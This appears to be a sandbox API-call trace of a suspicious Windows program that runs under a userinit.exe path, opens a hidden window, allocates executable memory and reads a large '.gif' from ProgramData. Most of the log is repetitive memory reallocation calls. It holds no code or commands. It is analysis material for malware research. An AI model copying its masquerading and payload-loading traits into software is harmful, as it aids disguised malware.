[0086.768] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x58155c) returned 1
[0086.768] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x14fd3f, fWinIni=0x0 | out: pvParam=0x14fd3f) returned 1
[0086.768] CreateFontIndirectA (lplf=0x14fd3f) returned 0xb0a0853
[0086.768] GetObjectA (in: h=0xb0a0853, c=60, pv=0x14fb30 | out: pv=0x14fb30) returned 60
[0086.768] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x14fbeb, fWinIni=0x0 | out: pvParam=0x14fbeb) returned 1
[0086.768] CreateFontIndirectA (lplf=0x14fcc7) returned 0xa0a0851
[0086.768] GetObjectA (in: h=0xa0a0851, c=60, pv=0x14fb30 | out: pv=0x14fb30) returned 60
[0086.769] CreateFontIndirectA (lplf=0x14fc8b) returned 0xa0a0852
[0086.769] GetObjectA (in: h=0xa0a0852, c=60, pv=0x14fb30 | out: pv=0x14fb30) returned 60
[0086.769] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0086.769] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x14fc9f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0086.769] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x14fc9f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0086.769] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0086.770] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x14fc54 | out: lpWndClass=0x14fc54) returned 0
[0086.770] RegisterClassA (lpWndClass=0x451c88) returned 0x20c160
[0086.770] GetSystemMetrics (nIndex=0) returned 1440
[0086.770] GetSystemMetrics (nIndex=1) returned 900
[0086.770] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x20140
[0086.774] SetWindowLongA (hWnd=0x20140, nIndex=-4, dwNewLong=856047) returned 4219500
[0086.775] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0086.775] SendMessageA (hWnd=0x20140, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0086.775] DefWindowProcA (hWnd=0x20140, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0086.789] DefWindowProcA (hWnd=0x20140, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x101d3
[0086.790] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0086.790] SetClassLongA (hWnd=0x20140, nIndex=-14, dwNewLong=65575) returned 0x0
[0086.790] GetSystemMenu (hWnd=0x20140, bRevert=0) returned 0x101d9
[0086.793] DeleteMenu (hMenu=0x101d9, uPosition=0xf030, uFlags=0x0) returned 1
[0086.793] DeleteMenu (hMenu=0x101d9, uPosition=0xf000, uFlags=0x0) returned 1
[0086.793] DeleteMenu (hMenu=0x101d9, uPosition=0xf010, uFlags=0x0) returned 1
[0086.793] GetKeyboardLayoutList (in: nBuff=64, lpList=0x14fc20 | out: lpList=0x14fc20) returned 1
[0086.794] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0086.794] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0086.795] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0086.795] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0086.795] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0086.795] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0086.795] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0086.795] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0086.795] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0086.796] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0086.796] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0086.796] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0086.796] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0086.796] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0086.796] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0086.796] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0086.796] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0086.796] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0086.796] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0086.796] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0086.796] GetCurrentThreadId () returned 0xf54
[0086.796] GlobalAddAtomA (lpString="WndProcPtr0040000000000F54") returned 0xc155
[0086.797] VirtualAlloc (lpAddress=0x584000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x584000
[0086.797] ShowWindow (hWnd=0x20140, nCmdShow=0) returned 0
[0086.797] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0086.797] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0086.798] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x14f9a0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x14f9a0*=0) returned 0x0
[0086.798] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x14f998*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x14f998*=0) returned 0x0
[0086.798] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x14f998*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x14f998*=0) returned 0x10be00
[0086.798] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x14f998*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x14f998*=0) returned 0x0
[0086.798] GlobalLock (hMem=0x790004) returned 0x8e0020
[0086.798] ReadFile (in: hFile=0x98, lpBuffer=0x8e0020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x14f9b4, lpOverlapped=0x0 | out: lpBuffer=0x8e0020*, lpNumberOfBytesRead=0x14f9b4*=0x10be00, lpOverlapped=0x0) returned 1
[0086.861] CloseHandle (hObject=0x98) returned 1
[0086.861] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.862] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.862] GlobalUnlock (hMem=0x79000c) returned 0
[0086.862] GlobalReAlloc (hMem=0x79000c, dwBytes=0x4000, uFlags=0x2) returned 0x79000c
[0086.862] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.863] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.863] GlobalUnlock (hMem=0x79000c) returned 0
[0086.863] GlobalReAlloc (hMem=0x79000c, dwBytes=0x6000, uFlags=0x2) returned 0x79000c
[0086.863] GlobalLock (hMem=0x79000c) returned 0x2aa820
[0086.864] GlobalHandle (pMem=0x2aa820) returned 0x79000c
[0086.864] GlobalUnlock (hMem=0x79000c) returned 0
[0086.864] GlobalReAlloc (hMem=0x79000c, dwBytes=0x8000, uFlags=0x2) returned 0x79000c
[0086.864] GlobalLock (hMem=0x79000c) returned 0x2b0830
[0086.865] GlobalHandle (pMem=0x2b0830) returned 0x79000c
[0086.865] GlobalUnlock (hMem=0x79000c) returned 0
[0086.865] GlobalReAlloc (hMem=0x79000c, dwBytes=0xa000, uFlags=0x2) returned 0x79000c
[0086.865] GlobalLock (hMem=0x79000c) returned 0x2b0830
[0086.866] GlobalHandle (pMem=0x2b0830) returned 0x79000c
[0086.866] GlobalUnlock (hMem=0x79000c) returned 0
[0086.866] GlobalReAlloc (hMem=0x79000c, dwBytes=0xc000, uFlags=0x2) returned 0x79000c
[0086.867] GlobalLock (hMem=0x79000c) returned 0x2ba840
[0086.867] GlobalHandle (pMem=0x2ba840) returned 0x79000c
[0086.867] GlobalUnlock (hMem=0x79000c) returned 0
[0086.867] GlobalReAlloc (hMem=0x79000c, dwBytes=0xe000, uFlags=0x2) returned 0x79000c
[0086.867] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.868] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.868] GlobalUnlock (hMem=0x79000c) returned 0
[0086.868] GlobalReAlloc (hMem=0x79000c, dwBytes=0x10000, uFlags=0x2) returned 0x79000c
[0086.868] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.869] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.869] GlobalUnlock (hMem=0x79000c) returned 0
[0086.869] GlobalReAlloc (hMem=0x79000c, dwBytes=0x12000, uFlags=0x2) returned 0x79000c
[0086.869] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.869] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.869] GlobalUnlock (hMem=0x79000c) returned 0
[0086.869] GlobalReAlloc (hMem=0x79000c, dwBytes=0x14000, uFlags=0x2) returned 0x79000c
[0086.869] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.870] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.870] GlobalUnlock (hMem=0x79000c) returned 0
[0086.870] GlobalReAlloc (hMem=0x79000c, dwBytes=0x16000, uFlags=0x2) returned 0x79000c
[0086.870] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.871] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.871] GlobalUnlock (hMem=0x79000c) returned 0
[0086.871] GlobalReAlloc (hMem=0x79000c, dwBytes=0x18000, uFlags=0x2) returned 0x79000c
[0086.871] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.871] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.871] GlobalUnlock (hMem=0x79000c) returned 0
[0086.871] GlobalReAlloc (hMem=0x79000c, dwBytes=0x1a000, uFlags=0x2) returned 0x79000c
[0086.871] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.872] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.872] GlobalUnlock (hMem=0x79000c) returned 0
[0086.872] GlobalReAlloc (hMem=0x79000c, dwBytes=0x1c000, uFlags=0x2) returned 0x79000c
[0086.872] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.873] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.873] GlobalUnlock (hMem=0x79000c) returned 0
[0086.873] GlobalReAlloc (hMem=0x79000c, dwBytes=0x1e000, uFlags=0x2) returned 0x79000c
[0086.873] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.873] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.873] GlobalUnlock (hMem=0x79000c) returned 0
[0086.873] GlobalReAlloc (hMem=0x79000c, dwBytes=0x20000, uFlags=0x2) returned 0x79000c
[0086.873] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.874] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.874] GlobalUnlock (hMem=0x79000c) returned 0
[0086.874] GlobalReAlloc (hMem=0x79000c, dwBytes=0x22000, uFlags=0x2) returned 0x79000c
[0086.876] GlobalLock (hMem=0x79000c) returned 0x2c6820
[0086.877] GlobalHandle (pMem=0x2c6820) returned 0x79000c
[0086.877] GlobalUnlock (hMem=0x79000c) returned 0
[0086.877] GlobalReAlloc (hMem=0x79000c, dwBytes=0x24000, uFlags=0x2) returned 0x79000c
[0086.877] GlobalLock (hMem=0x79000c) returned 0x2c6820
[0086.877] GlobalHandle (pMem=0x2c6820) returned 0x79000c
[0086.877] GlobalUnlock (hMem=0x79000c) returned 0
[0086.877] GlobalReAlloc (hMem=0x79000c, dwBytes=0x26000, uFlags=0x2) returned 0x79000c
[0086.880] GlobalLock (hMem=0x79000c) returned 0x2ea830
[0086.880] GlobalHandle (pMem=0x2ea830) returned 0x79000c
[0086.881] GlobalUnlock (hMem=0x79000c) returned 0
[0086.881] GlobalReAlloc (hMem=0x79000c, dwBytes=0x28000, uFlags=0x2) returned 0x79000c
[0086.881] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.881] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.881] GlobalUnlock (hMem=0x79000c) returned 0
[0086.881] GlobalReAlloc (hMem=0x79000c, dwBytes=0x2a000, uFlags=0x2) returned 0x79000c
[0086.881] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.882] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.882] GlobalUnlock (hMem=0x79000c) returned 0
[0086.882] GlobalReAlloc (hMem=0x79000c, dwBytes=0x2c000, uFlags=0x2) returned 0x79000c
[0086.882] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.882] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.882] GlobalUnlock (hMem=0x79000c) returned 0
[0086.882] GlobalReAlloc (hMem=0x79000c, dwBytes=0x2e000, uFlags=0x2) returned 0x79000c
[0086.882] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.883] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.883] GlobalUnlock (hMem=0x79000c) returned 0
[0086.883] GlobalReAlloc (hMem=0x79000c, dwBytes=0x30000, uFlags=0x2) returned 0x79000c
[0086.883] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.884] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.884] GlobalUnlock (hMem=0x79000c) returned 0
[0086.884] GlobalReAlloc (hMem=0x79000c, dwBytes=0x32000, uFlags=0x2) returned 0x79000c
[0086.884] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.884] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.884] GlobalUnlock (hMem=0x79000c) returned 0
[0086.884] GlobalReAlloc (hMem=0x79000c, dwBytes=0x34000, uFlags=0x2) returned 0x79000c
[0086.884] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.885] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.885] GlobalUnlock (hMem=0x79000c) returned 0
[0086.885] GlobalReAlloc (hMem=0x79000c, dwBytes=0x36000, uFlags=0x2) returned 0x79000c
[0086.885] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.932] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.933] GlobalUnlock (hMem=0x79000c) returned 0
[0086.933] GlobalReAlloc (hMem=0x79000c, dwBytes=0x38000, uFlags=0x2) returned 0x79000c
[0086.933] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.933] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.933] GlobalUnlock (hMem=0x79000c) returned 0
[0086.933] GlobalReAlloc (hMem=0x79000c, dwBytes=0x3a000, uFlags=0x2) returned 0x79000c
[0086.933] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.934] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.934] GlobalUnlock (hMem=0x79000c) returned 0
[0086.934] GlobalReAlloc (hMem=0x79000c, dwBytes=0x3c000, uFlags=0x2) returned 0x79000c
[0086.934] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.934] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.934] GlobalUnlock (hMem=0x79000c) returned 0
[0086.934] GlobalReAlloc (hMem=0x79000c, dwBytes=0x3e000, uFlags=0x2) returned 0x79000c
[0086.934] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.935] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.935] GlobalUnlock (hMem=0x79000c) returned 0
[0086.935] GlobalReAlloc (hMem=0x79000c, dwBytes=0x40000, uFlags=0x2) returned 0x79000c
[0086.935] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.936] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.936] GlobalUnlock (hMem=0x79000c) returned 0
[0086.936] GlobalReAlloc (hMem=0x79000c, dwBytes=0x42000, uFlags=0x2) returned 0x79000c
[0086.936] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.936] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.936] GlobalUnlock (hMem=0x79000c) returned 0
[0086.936] GlobalReAlloc (hMem=0x79000c, dwBytes=0x44000, uFlags=0x2) returned 0x79000c
[0086.936] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.937] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.937] GlobalUnlock (hMem=0x79000c) returned 0
[0086.937] GlobalReAlloc (hMem=0x79000c, dwBytes=0x46000, uFlags=0x2) returned 0x79000c
[0086.937] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.937] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.938] GlobalUnlock (hMem=0x79000c) returned 0
[0086.938] GlobalReAlloc (hMem=0x79000c, dwBytes=0x48000, uFlags=0x2) returned 0x79000c
[0086.938] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.938] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.938] GlobalUnlock (hMem=0x79000c) returned 0
[0086.938] GlobalReAlloc (hMem=0x79000c, dwBytes=0x4a000, uFlags=0x2) returned 0x79000c
[0086.938] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.939] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.939] GlobalUnlock (hMem=0x79000c) returned 0
[0086.939] GlobalReAlloc (hMem=0x79000c, dwBytes=0x4c000, uFlags=0x2) returned 0x79000c
[0086.939] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.939] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.939] GlobalUnlock (hMem=0x79000c) returned 0
[0086.939] GlobalReAlloc (hMem=0x79000c, dwBytes=0x4e000, uFlags=0x2) returned 0x79000c
[0086.939] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.940] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.940] GlobalUnlock (hMem=0x79000c) returned 0
[0086.940] GlobalReAlloc (hMem=0x79000c, dwBytes=0x50000, uFlags=0x2) returned 0x79000c
[0086.940] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.941] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.941] GlobalUnlock (hMem=0x79000c) returned 0
[0086.941] GlobalReAlloc (hMem=0x79000c, dwBytes=0x52000, uFlags=0x2) returned 0x79000c
[0086.941] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.941] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.941] GlobalUnlock (hMem=0x79000c) returned 0
[0086.941] GlobalReAlloc (hMem=0x79000c, dwBytes=0x54000, uFlags=0x2) returned 0x79000c
[0086.941] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.942] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.942] GlobalUnlock (hMem=0x79000c) returned 0
[0086.942] GlobalReAlloc (hMem=0x79000c, dwBytes=0x56000, uFlags=0x2) returned 0x79000c
[0086.942] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.943] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.943] GlobalUnlock (hMem=0x79000c) returned 0
[0086.943] GlobalReAlloc (hMem=0x79000c, dwBytes=0x58000, uFlags=0x2) returned 0x79000c
[0086.943] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.943] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.943] GlobalUnlock (hMem=0x79000c) returned 0
[0086.943] GlobalReAlloc (hMem=0x79000c, dwBytes=0x5a000, uFlags=0x2) returned 0x79000c
[0086.943] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.944] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.944] GlobalUnlock (hMem=0x79000c) returned 0
[0086.944] GlobalReAlloc (hMem=0x79000c, dwBytes=0x5c000, uFlags=0x2) returned 0x79000c
[0086.944] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.944] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.944] GlobalUnlock (hMem=0x79000c) returned 0
[0086.944] GlobalReAlloc (hMem=0x79000c, dwBytes=0x5e000, uFlags=0x2) returned 0x79000c
[0086.944] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.945] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.945] GlobalUnlock (hMem=0x79000c) returned 0
[0086.945] GlobalReAlloc (hMem=0x79000c, dwBytes=0x60000, uFlags=0x2) returned 0x79000c
[0086.945] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.946] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.946] GlobalUnlock (hMem=0x79000c) returned 0
[0086.946] GlobalReAlloc (hMem=0x79000c, dwBytes=0x62000, uFlags=0x2) returned 0x79000c
[0086.946] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.946] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.946] GlobalUnlock (hMem=0x79000c) returned 0
[0086.946] GlobalReAlloc (hMem=0x79000c, dwBytes=0x64000, uFlags=0x2) returned 0x79000c
[0086.946] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.947] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.947] GlobalUnlock (hMem=0x79000c) returned 0
[0086.947] GlobalReAlloc (hMem=0x79000c, dwBytes=0x66000, uFlags=0x2) returned 0x79000c
[0086.947] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.948] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.948] GlobalUnlock (hMem=0x79000c) returned 0
[0086.948] GlobalReAlloc (hMem=0x79000c, dwBytes=0x68000, uFlags=0x2) returned 0x79000c
[0086.948] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.948] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.948] GlobalUnlock (hMem=0x79000c) returned 0
[0086.948] GlobalReAlloc (hMem=0x79000c, dwBytes=0x6a000, uFlags=0x2) returned 0x79000c
[0086.948] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0086.949] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0086.949] GlobalUnlock (hMem=0x79000c) returned 0
[0086.949] GlobalReAlloc (hMem=0x79000c, dwBytes=0x6c000, uFlags=0x2) returned 0x79000c
[0086.956] GlobalLock (hMem=0x79000c) returned 0x310820
[0086.956] GlobalHandle (pMem=0x310820) returned 0x79000c
[0086.956] GlobalUnlock (hMem=0x79000c) returned 0
[0086.956] GlobalReAlloc (hMem=0x79000c, dwBytes=0x6e000, uFlags=0x2) returned 0x79000c
[0086.956] GlobalLock (hMem=0x79000c) returned 0x310820
[0086.957] GlobalHandle (pMem=0x310820) returned 0x79000c
[0086.957] GlobalUnlock (hMem=0x79000c) returned 0
[0086.957] GlobalReAlloc (hMem=0x79000c, dwBytes=0x70000, uFlags=0x2) returned 0x79000c
[0086.973] GlobalLock (hMem=0x79000c) returned 0x2430048
[0086.974] GlobalHandle (pMem=0x2430048) returned 0x79000c
[0086.974] GlobalUnlock (hMem=0x79000c) returned 0
[0086.974] GlobalReAlloc (hMem=0x79000c, dwBytes=0x72000, uFlags=0x2) returned 0x79000c
[0087.027] GlobalLock (hMem=0x79000c) returned 0x24a0058
[0087.028] GlobalHandle (pMem=0x24a0058) returned 0x79000c
[0087.028] GlobalUnlock (hMem=0x79000c) returned 0
[0087.028] GlobalReAlloc (hMem=0x79000c, dwBytes=0x74000, uFlags=0x2) returned 0x79000c
[0087.028] GlobalLock (hMem=0x79000c) returned 0x24a0058
[0087.028] GlobalHandle (pMem=0x24a0058) returned 0x79000c
[0087.029] GlobalUnlock (hMem=0x79000c) returned 0
[0087.029] GlobalReAlloc (hMem=0x79000c, dwBytes=0x76000, uFlags=0x2) returned 0x79000c
[0087.042] GlobalLock (hMem=0x79000c) returned 0x2a6810
[0087.043] GlobalHandle (pMem=0x2a6810) returned 0x79000c
[0087.043] GlobalUnlock (hMem=0x79000c) returned 0
[0087.043] GlobalReAlloc (hMem=0x79000c, dwBytes=0x78000, uFlags=0x2) returned 0x79000c
[0087.049] GlobalLock (hMem=0x79000c) returned 0x2430048
[0087.050] GlobalHandle (pMem=0x2430048) returned 0x79000c
[0087.050] GlobalUnlock (hMem=0x79000c) returned 0
[0087.050] GlobalReAlloc (hMem=0x79000c, dwBytes=0x7a000, uFlags=0x2) returned 0x79000c
[0087.056] GlobalLock (hMem=0x79000c) returned 0x24a8058
[0087.057] GlobalHandle (pMem=0x24a8058) returned 0x79000c
[0087.057] GlobalUnlock (hMem=0x79000c) returned 0
[0087.057] GlobalReAlloc (hMem=0x79000c, dwBytes=0x7c000, uFlags=0x2) returned 0x79000c
[0087.057] GlobalLock (hMem=0x79000c) returned 0x24a8058
[0087.058] GlobalHandle (pMem=0x24a8058) returned 0x79000c
[0087.058] GlobalUnlock (hMem=0x79000c) returned 0
[0087.058] GlobalReAlloc (hMem=0x79000c, dwBytes=0x7e000, uFlags=0x2) returned 0x79000c
[0087.120] GlobalLock (hMem=0x79000c) returned 0x2530048
[0087.121] GlobalHandle (pMem=0x2530048) returned 0x79000c
[0087.121] GlobalUnlock (hMem=0x79000c) returned 0
[0087.121] GlobalReAlloc (hMem=0x79000c, dwBytes=0x80000, uFlags=0x2) returned 0x79000c
[0087.141] GlobalLock (hMem=0x79000c) returned 0x810020
[0087.142] GlobalHandle (pMem=0x810020) returned 0x79000c
[0087.142] GlobalUnlock (hMem=0x79000c) returned 0
[0087.142] GlobalReAlloc (hMem=0x79000c, dwBytes=0x82000, uFlags=0x2) returned 0x79000c
[0087.156] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.157] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.157] GlobalUnlock (hMem=0x79000c) returned 0
[0087.157] GlobalReAlloc (hMem=0x79000c, dwBytes=0x84000, uFlags=0x2) returned 0x79000c
[0087.218] GlobalLock (hMem=0x79000c) returned 0x810020
[0087.219] GlobalHandle (pMem=0x810020) returned 0x79000c
[0087.219] GlobalUnlock (hMem=0x79000c) returned 0
[0087.219] GlobalReAlloc (hMem=0x79000c, dwBytes=0x86000, uFlags=0x2) returned 0x79000c
[0087.233] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.234] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.234] GlobalUnlock (hMem=0x79000c) returned 0
[0087.234] GlobalReAlloc (hMem=0x79000c, dwBytes=0x88000, uFlags=0x2) returned 0x79000c
[0087.248] GlobalLock (hMem=0x79000c) returned 0x810020
[0087.249] GlobalHandle (pMem=0x810020) returned 0x79000c
[0087.249] GlobalUnlock (hMem=0x79000c) returned 0
[0087.249] GlobalReAlloc (hMem=0x79000c, dwBytes=0x8a000, uFlags=0x2) returned 0x79000c
[0087.310] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.311] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.311] GlobalUnlock (hMem=0x79000c) returned 0
[0087.311] GlobalReAlloc (hMem=0x79000c, dwBytes=0x8c000, uFlags=0x2) returned 0x79000c
[0087.325] GlobalLock (hMem=0x79000c) returned 0x810020
[0087.326] GlobalHandle (pMem=0x810020) returned 0x79000c
[0087.327] GlobalUnlock (hMem=0x79000c) returned 0
[0087.327] GlobalReAlloc (hMem=0x79000c, dwBytes=0x8e000, uFlags=0x2) returned 0x79000c
[0087.341] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.342] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.342] GlobalUnlock (hMem=0x79000c) returned 0
[0087.342] GlobalReAlloc (hMem=0x79000c, dwBytes=0x90000, uFlags=0x2) returned 0x79000c
[0087.403] GlobalLock (hMem=0x79000c) returned 0x2730020
[0087.404] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0087.404] GlobalUnlock (hMem=0x79000c) returned 0
[0087.404] GlobalReAlloc (hMem=0x79000c, dwBytes=0x92000, uFlags=0x2) returned 0x79000c
[0087.419] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.420] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.420] GlobalUnlock (hMem=0x79000c) returned 0
[0087.420] GlobalReAlloc (hMem=0x79000c, dwBytes=0x94000, uFlags=0x2) returned 0x79000c
[0087.436] GlobalLock (hMem=0x79000c) returned 0x2730020
[0087.437] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0087.437] GlobalUnlock (hMem=0x79000c) returned 0
